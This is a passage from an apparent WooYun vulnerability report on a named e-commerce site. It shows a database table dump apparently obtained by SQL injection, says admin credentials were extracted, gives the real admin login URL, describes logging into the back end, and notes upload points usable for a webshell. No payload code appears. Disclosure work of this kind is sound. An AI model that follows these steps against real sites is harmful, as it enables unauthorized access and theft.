| starmall_goods_attr_index     |
| starmall_goods_class          |
| starmall_goods_class_staple   |
| starmall_goods_class_tag      |
| starmall_goods_content        |
| starmall_goods_group          |
| starmall_goods_spec           |
| starmall_goods_spec_index     |
| starmall_groupbuy_area        |
| starmall_groupbuy_class       |
| starmall_groupbuy_price_range |
| starmall_groupbuy_template    |
| starmall_inform               |
| starmall_inform_subject       |
| starmall_inform_subject_type  |
| starmall_link                 |
| starmall_lock                 |
| starmall_mail_msg_temlates    |
| starmall_map                  |
| starmall_member               |
| starmall_message              |
| starmall_micro_adv            |
| starmall_micro_comment        |
| starmall_micro_goods          |
| starmall_micro_goods_class    |
| starmall_micro_goods_relation |
| starmall_micro_like           |
| starmall_micro_member_info    |
| starmall_micro_personal       |
| starmall_micro_personal_class |
| starmall_micro_store          |
| starmall_navigation           |
| starmall_order                |
| starmall_order_address        |
| starmall_order_goods          |
| starmall_order_log            |
| starmall_p_bundling           |
| starmall_p_bundling_goods     |
| starmall_p_bundling_quota     |
| starmall_p_mansong            |
| starmall_p_mansong_apply      |
| starmall_p_mansong_quota      |
| starmall_p_mansong_rule       |
| starmall_p_xianshi            |
| starmall_p_xianshi_apply      |
| starmall_p_xianshi_goods      |
| starmall_p_xianshi_quota      |
| starmall_payment              |
| starmall_points_cart          |
| starmall_points_goods         |
| starmall_points_log           |
| starmall_points_order         |
| starmall_points_orderaddress  |
| starmall_points_ordergoods    |
| starmall_predeposit_cash      |
| starmall_predeposit_log       |
| starmall_predeposit_recharge  |
| starmall_rec_position         |
| starmall_recommend            |
| starmall_recommend_goods      |
| starmall_refund_log           |
| starmall_return               |
| starmall_return_goods         |
| starmall_salenum              |
| starmall_seo                  |
| starmall_setting              |
| starmall_sns_albumclass       |
| starmall_sns_albumpic         |
| starmall_sns_binding          |
| starmall_sns_comment          |
| starmall_sns_friend           |
| starmall_sns_goods            |
| starmall_sns_membertag        |
| starmall_sns_mtagmember       |
| starmall_sns_s_autosetting    |
| starmall_sns_s_comment        |
| starmall_sns_s_tracelog       |
| starmall_sns_setting          |
| starmall_sns_sharegoods       |
| starmall_sns_sharestore       |
| starmall_sns_tracelog         |
| starmall_sns_visitor          |
| starmall_spec                 |
| starmall_spec_value           |
| starmall_store                |
| starmall_store_class          |
| starmall_store_class_goods    |
| starmall_store_extend         |
| starmall_store_goods_class    |
| starmall_store_grade          |
| starmall_store_gradelog       |
| starmall_store_navigation     |
| starmall_store_partner        |
| starmall_store_watermark      |
| starmall_transport            |
| starmall_transport_extend     |
| starmall_type                 |
| starmall_type_brand           |
| starmall_type_spec            |
| starmall_upload               |
| starmall_voucher              |
| starmall_voucher_apply        |
| starmall_voucher_price        |
| starmall_voucher_quota        |
| starmall_voucher_template     |
| starmall_web                  |
| starmall_web_code             |
| starmall_ztc_glodlog          |
| starmall_ztc_goods            |
+-------------------------------+


用户名密码依据跑出。
9.在看看这两个表对应的后台地址,搜索下试试,http://edingcn.com/admin/index.php?act=login&op=login找到一个家工厂的登录页面。应该还有一个,不去找了,先登录第一个后台,看看功能。
10.登录后台:

QQ截图20140306094352.png


看到后台管理,确实是管理开店的:

3.png

这都是白花花的钱啊。
webshell就不拿了,看了一番有几个上传的地方,还是先报告吧。

修复方案:

过滤字符吧。

版权声明:转载请注明来源 小r00to1@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝